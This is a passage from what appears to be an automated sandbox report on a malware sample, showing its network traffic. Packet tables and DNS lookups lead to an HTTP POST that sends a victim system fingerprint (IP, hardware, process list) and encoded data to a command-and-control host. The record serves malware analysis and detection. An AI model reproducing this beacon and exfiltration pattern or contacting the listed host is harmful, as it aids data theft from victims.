                                                            Dec 20, 2024 16:32:27.942150116 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942161083 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942171097 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942173004 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.942179918 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942190886 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:27.942235947 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:27.942264080 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.059712887 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.059855938 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.059981108 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060031891 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060065985 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.060100079 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.060152054 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060203075 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.060269117 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060404062 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060414076 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060715914 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060903072 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.060911894 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061042070 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061228991 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061239004 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061410904 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061422110 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061429977 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.061439991 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062066078 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062076092 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062096119 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062105894 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062114954 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062124968 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062134027 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062144041 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062191010 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062323093 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062331915 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062340975 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062350035 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062381029 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062413931 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062439919 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062531948 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062541962 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062580109 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062673092 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062683105 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062782049 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062792063 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062948942 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062958956 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062968016 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.062985897 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.063035965 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.063045979 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064120054 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064130068 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064137936 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064147949 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064157009 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064165115 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064176083 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064184904 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064194918 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064204931 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064213991 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064223051 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064230919 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064241886 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064250946 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.064883947 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.064955950 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.107532978 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.107990980 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.108094931 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.108777046 CET4970380192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:28.179625988 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179656982 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179748058 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179757118 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179862022 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.179990053 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.180006027 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.180023909 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.180067062 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184639931 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184731007 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184807062 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184834003 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184844017 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.184901953 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185003996 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185096025 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185106993 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185116053 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185127020 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185178041 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185216904 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185228109 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185281992 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185391903 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185403109 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185420036 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185534000 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185585022 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185656071 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185666084 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185707092 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185774088 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185785055 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185931921 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185942888 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.185951948 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186048985 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186058998 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186069012 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186079025 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186110973 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186134100 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186212063 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186222076 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186350107 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186542988 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186553001 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186566114 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186664104 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186674118 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186867952 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186880112 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186894894 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.186906099 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187103987 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187114000 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187123060 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187133074 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187143087 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187215090 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187227964 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.187237024 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.227669001 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:28.228415966 CET8049703185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:29.841876984 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:29.962083101 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:29.962228060 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:29.962542057 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:30.082689047 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:31.252634048 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:31.252927065 CET8049709185.121.15.192192.168.2.7
                                                            Dec 20, 2024 16:32:31.253174067 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:31.253267050 CET4970980192.168.2.7185.121.15.192
                                                            Dec 20, 2024 16:32:31.372951031 CET8049709185.121.15.192192.168.2.7

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Dec 20, 2024 16:32:21.756201982 CET5236253192.168.2.71.1.1.1
                                                            Dec 20, 2024 16:32:21.756289959 CET5236253192.168.2.71.1.1.1
                                                            Dec 20, 2024 16:32:21.893759966 CET53523621.1.1.1192.168.2.7
                                                            Dec 20, 2024 16:32:22.041868925 CET53523621.1.1.1192.168.2.7
                                                            Dec 20, 2024 16:32:26.301234961 CET6513453192.168.2.71.1.1.1
                                                            Dec 20, 2024 16:32:26.301234961 CET6513453192.168.2.71.1.1.1
                                                            Dec 20, 2024 16:32:26.590204000 CET53651341.1.1.1192.168.2.7
                                                            Dec 20, 2024 16:32:26.710706949 CET53651341.1.1.1192.168.2.7
                                                            Dec 20, 2024 16:32:29.699081898 CET6513653192.168.2.71.1.1.1
                                                            Dec 20, 2024 16:32:29.699147940 CET6513653192.168.2.71.1.1.1
                                                            Dec 20, 2024 16:32:29.837148905 CET53651361.1.1.1192.168.2.7
                                                            Dec 20, 2024 16:32:29.837187052 CET53651361.1.1.1192.168.2.7

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Dec 20, 2024 16:32:21.756201982 CET192.168.2.71.1.1.10x1ddfStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:32:21.756289959 CET192.168.2.71.1.1.10x421cStandard query (0)httpbin.org28IN (0x0001)false
                                                            Dec 20, 2024 16:32:26.301234961 CET192.168.2.71.1.1.10xa6faStandard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:32:26.301234961 CET192.168.2.71.1.1.10x10ddStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                            Dec 20, 2024 16:32:29.699081898 CET192.168.2.71.1.1.10x8e68Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:32:29.699147940 CET192.168.2.71.1.1.10x7bcStandard query (0)home.fivetk5ht.top28IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Dec 20, 2024 16:32:22.041868925 CET1.1.1.1192.168.2.70x1ddfNo error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:32:22.041868925 CET1.1.1.1192.168.2.70x1ddfNo error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:32:26.590204000 CET1.1.1.1192.168.2.70xa6faNo error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                            Dec 20, 2024 16:32:29.837148905 CET1.1.1.1192.168.2.70x8e68No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • httpbin.org
                                                            • home.fivetk5ht.top

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.749703185.121.15.192805140C:\Users\user\Desktop\t6VDbnvGeN.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 20, 2024 16:32:26.834173918 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                            Host: home.fivetk5ht.top
                                                            Accept: */*
                                                            Content-Type: application/json
                                                            Content-Length: 560191
                                                            Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 37 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                            Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708743", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 556 }, { "name": "services.exe", "pid": 624 }, { "name": "lsass.exe", "pid": 632 }, { "name": "svchost.exe", "pid": 748 }, { "name": "fontdrvhost.exe", "pid": 772 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "svchost.exe", "pid": 864 }, { "name": "svchost.exe", "pid": 912 }, { "name": "dwm.exe", "pid": 976 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 704 }, { "name": "svchost.exe", "pid": 860 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                            Dec 20, 2024 16:32:26.954190016 CET9888OUTData Raw: 4c 2b 7a 43 6e 67 63 7a 77 75 56 35 68 69 36 6b 74 56 47 47 42 77 6d 4b 6c 64 57 61 54 6c 48 6d 2b 4f 71 4b 37 72 78 6c 38 4d 76 69 42 38 50 58 69 48 6a 50 77 68 72 6d 67 57 39 7a 4b 59 62 48 55 37 79 78 6b 62 51 39 56 64 55 38 77 6e 52 74 66 74
                                                            Data Ascii: L+zCngczwuV5hi6ktVGGBwmKldWaTlHm+OqK7rxl8MviB8PXiHjPwhrmgW9zKYbHU7yxkbQ9VdU8wnRtft\/P0TWowmW87Sr+8hwr\/ALzKMBwtfqOExmEx9CnisDisPjMNVV6WJwlaniKFRbXp1qMp05q+l4yZ+TY3A43LcTUweY4PFYDGUXy1sLjcPWwuJpNq9qlCvCnVg7a2lFOw1\/un8P5ioatbWYZ5+p\/+uajf7p\/D+
                                                            Dec 20, 2024 16:32:26.954243898 CET2472OUTData Raw: 62 55 77 57 46 6d 73 4e 52 34 6a 6a 55 72 55 61 32 4a 68 44 4c 6f 34 79 6c 51 57 46 71 5a 70 4c 36 68 54 63 63 52 4a 55 56 5c 2f 71 35 6c 50 69 42 6b 47 4c 7a 62 4c 75 46 63 77 38 54 4d 78 77 76 46 6c 58 67 5c 2f 42 63 58 35 68 67 66 59 38 4a 30
                                                            Data Ascii: bUwWFmsNR4jjUrUa2JhDLo4ylQWFqZpL6hTccRJUV\/q5lPiBkGLzbLuFcw8TMxwvFlXg\/BcX5hgfY8J0cJhcLVwVLG4qH1itw5OlSr0cNOeYPBVa8sVTypfX6l8PF1XLrOt+Mde+MHh7T9b8K\/ta\/s6R\/HvxlNoGlXWoL+xT4n8Dnxr4Y+DmueJGiu20Hx78ZvHunyap4G+Duo+XNHp0+jDVLOCGVtObUPNf+e7\/go34G
                                                            Dec 20, 2024 16:32:26.954314947 CET7416OUTData Raw: 2b 49 52 35 48 6a 67 61 5c 2f 71 38 45 66 5c 2f 41 41 6a 2b 69 36 75 76 68 75 53 34 30 57 62 52 37 5c 2f 57 62 48 58 4e 47 48 69 47 32 38 52 58 74 70 61 61 52 70 39 31 65 78 5c 2f 38 41 4f 6a 6d 57 63 59 4c 4a 66 44 75 6c 69 63 5a 69 6e 68 70 56
                                                            Data Ascii: +IR5Hjga\/q8Ef\/AAj+i6uvhuS40WbR7\/WbHXNGHiG28RXtpaaRp91ex\/8AOjmWcYLJfDulicZinhpVOF6GGwcKNRQx2Lx+IyqNLCYTLYXVStmFevKEMLSpKVR1XF2STa\/6xeEOA+IfEH6VWKyjIMlhm1LCeMeYZxxBXx+EniOHMk4ZyzjarjM8z3i6vy\/Vsv4WyzL6WIxGdYzG1KOGhgoVYObnOEJfTH\/BMn4oeLvjD+
                                                            Dec 20, 2024 16:32:26.954363108 CET2472OUTData Raw: 46 79 36 33 5c 2f 52 4b 38 54 37 4b 37 5c 2f 77 42 32 6f 64 44 2b 57 6e 34 6e 5c 2f 47 44 78 39 38 58 37 6a 77 5a 50 34 36 31 71 54 55 34 76 68 37 38 4f 50 41 33 77 70 38 47 32 43 4b 30 4f 6e 36 42 34 4c 2b 48 33 68 36 78 38 4f 61 48 70 31 68 61
                                                            Data Ascii: Fy63\/RK8T7K7\/wB2odD+Wn4n\/GDx98X7jwZP461qTU4vh78OPA3wp8G2CK0On6B4L+H3h6x8OaHp1hab3SGSeGybVNWnUhtQ1q\/1C\/cJ9oWKPqf2ffjjqnwP8Yanevay6\/4A8eeGdZ+HXxc8DGZIbbxv8OPFNs1jrmlrJNHNDZa7pweLXfCOtmGSTQvFGmaVqPl3FtFdWd1\/T+f+CAn7G4\/5qX+0x+HjH4Wn\/wB41T
                                                            Dec 20, 2024 16:32:26.954396009 CET2472OUTData Raw: 58 6a 66 37 4b 66 5c 2f 41 41 54 6d 2b 46 66 37 4d 50 69 2b 48 34 69 7a 65 4b 76 46 48 78 61 38 66 36 4a 34 5a 66 77 52 34 43 38 51 2b 4e 4c 50 51 4e 4f 74 5c 2f 68 35 34 53 75 58 6c 6d 31 71 48 77 31 6f 58 68 72 54 74 4d 30 6e 5c 2f 41 49 53 76
                                                            Data Ascii: Xjf7Kf\/AATm+Ff7MPi+H4izeKvFHxa8f6J4ZfwR4C8Q+NLPQNOt\/h54SuXlm1qHw1oXhrTtM0n\/AISvxjdz3F\/468fahBeeK\/FF9eanPc39v\/bviFNW9r\/Yg\/5Mt\/ZC\/wCzXvgD\/wCqo8J1+G\/7YH7EP7Qnxf8Ajp\/wVF+MPgv4c2XhvTtL8L+Pbnwb460bRfiDJ8ff2ibPWv8AglTpXwfsvgF8OtL0\/wALQ+
                                                            Dec 20, 2024 16:32:27.074130058 CET4944OUTData Raw: 2f 4c 48 79 5c 2f 38 50 36 5c 2f 30 70 6a 62 5c 2f 41 44 50 37 37 78 5c 2f 38 38 5c 2f 38 41 50 34 39 36 6d 78 6a 66 68 5c 2f 38 41 74 33 38 72 50 6b 5c 2f 79 39 5c 2f 38 41 4a 70 6b 6e 6c 72 73 5c 2f 31 6e 6d 64 34 34 2b 4f 6e 2b 66 5c 2f 41 4b
                                                            Data Ascii: /LHy\/8P6\/0pjb\/ADP77x\/88\/8AP496mxjfh\/8At38rPk\/y9\/8AJpknlrs\/1nmd44+On+f\/AK9BZW7lCm9Mf6z\/AD\/nv0JqFo\/n8nZ5zyf9t\/fj\/P1q42zZ9+NE\/wBVJJ\/7a469PX6VD84jdN8bvJ3EVr6f4\/59Og6CtJs8p4k\/5Z\/62P8A5bjv\/pd3n049qZJGqzOn7zZJ\/wAtJP38\/X+X86mA\/
                                                            Dec 20, 2024 16:32:27.074193001 CET4944OUTData Raw: 76 38 41 53 5c 2f 48 66 68 5a 4c 37 53 76 45 5c 2f 68 43 54 56 6c 6a 31 58 57 62 53 50 55 72 63 58 48 68 5c 2f 53 4e 53 65 47 7a 31 76 51 64 59 69 45 6b 30 6c 73 2b 72 79 4d 31 75 52 38 59 65 4b 66 2b 43 6c 50 37 56 48 6a 6a 34 61 2b 4d 50 68 58
                                                            Data Ascii: v8AS\/HfhZL7SvE\/hCTVlj1XWbSPUrcXHh\/SNSeGz1vQdYiEk0ls+ryM1uR8YeKf+ClP7VHjj4a+MPhX438ReFPFHh7xx4Y1DwrrV1d+DdI0vWEsNUtWs7m4sbrw0uh20N8IiTFNNZXESv8AM8D9K+GtFttAk0y5u\/iJ8Wvgv8BdXg\/aI8c\/srR+E\/jVrvxM0jWrn42fDmz8G3Xi7w1Nq\/gX4Q\/ELwB4Z07SpPHnh2z
                                                            Dec 20, 2024 16:32:27.074295044 CET4944OUTData Raw: 62 6d 7a 6e 32 48 61 5c 2f 6c 58 4d 4c 51 53 62 47 77 64 72 62 4a 47 32 6e 42 77 65 63 56 73 72 59 68 5c 2f 45 76 77 78 38 4e 48 58 76 43 55 42 2b 4b 5c 2f 77 75 31 6e 34 78 36 46 72 31 33 71 65 75 57 76 68 76 52 66 68 5c 2f 77 43 45 72 33 34 6b
                                                            Data Ascii: bmzn2Ha\/lXMLQSbGwdrbJG2nBwecVsrYh\/Evwx8NHXvCUB+K\/wu1n4x6Fr13qeuWvhvRfh\/wCEr34kWfxA1vxXfSeGDd2EXw6T4S+PL\/xgdH07X4rWw0OWfTJdV82BZK1jaXupX3xlsdP1LwbeL8Dvgd4b\/aG8WalF4kv4NJ1f4a+LfDPhPxz4fuvCFxqPhyxutV1nU\/AfixPGttoup2Oh3R8PeHfFlw5jutDktJvzHN
                                                            Dec 20, 2024 16:32:27.116830111 CET27192OUTData Raw: 7a 39 52 54 4a 47 54 35 5c 2f 6b 5c 2f 36 5a 53 5c 2f 34 66 58 33 35 4e 54 37 50 7a 5c 2f 44 5c 2f 67 6e 51 56 70 49 33 58 61 5c 2f 37 78 34 2b 6e 50 34 65 6e 34 6e 33 37 30 7a 61 2b 32 48 35 43 6a 5c 2f 36 71 57 54 5c 2f 32 31 5c 2f 6c 5c 2f 6e
                                                            Data Ascii: z9RTJGT5\/k\/6ZS\/4fX35NT7Pz\/D\/gnQVpI3Xa\/7x4+nP4en4n370za+2H5Cj\/6qWT\/21\/l\/nirRV\/MTf5n+u\/5Zy\/uP\/rVHtffvf5D53lfvP+Wv8vp1\/nR7Pz\/D\/ggM8v8Adwozl0\/0jzfyo+QKjzP5f\/PXt\/o\/+fx\/KiTfIrp9zr3\/AMjnn8KZ5j8On2fyfXyv3H\/Xraf5OazOghb729EkTy\/
                                                            Dec 20, 2024 16:32:27.236087084 CET7416OUTData Raw: 38 5c 2f 6e 5c 2f 4c 74 55 30 6e 2b 72 64 5c 2f 33 6d 38 5a 69 69 5c 2f 36 62 66 35 5c 2f 4f 6d 72 76 4d 62 66 4a 38 5c 2f 6c 66 38 65 37 5c 2f 41 4c 2b 66 5c 2f 50 38 41 6e 31 71 6a 53 6e 31 2b 58 36 6c 57 52 58 38 78 33 52 49 34 55 5c 2f 31 65
                                                            Data Ascii: 8\/n\/LtU0n+rd\/3m8Zii\/6bf5\/OmrvMbfJ8\/lf8e7\/AL+f\/P8An1qjSn1+X6lWRX8x3RI4U\/1e\/P8An\/65+nJ5b7UkRN6f1A6e36ntT\/MjjjRP4\/8Arl7\/AJf5zTJNnlqhSRHk6Rxyf5\/+vig0GDf8iP5b+ZKfN8vjn6\/h\/jULR+XsRPMdJIvKhj7\/AOf59feptyKp\/wBXD+64\/Pt\/2ERj\/PNM8t22
                                                            Dec 20, 2024 16:32:28.107532978 CET212INHTTP/1.0 503 Service Unavailable
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Content-Type: text/html
                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>

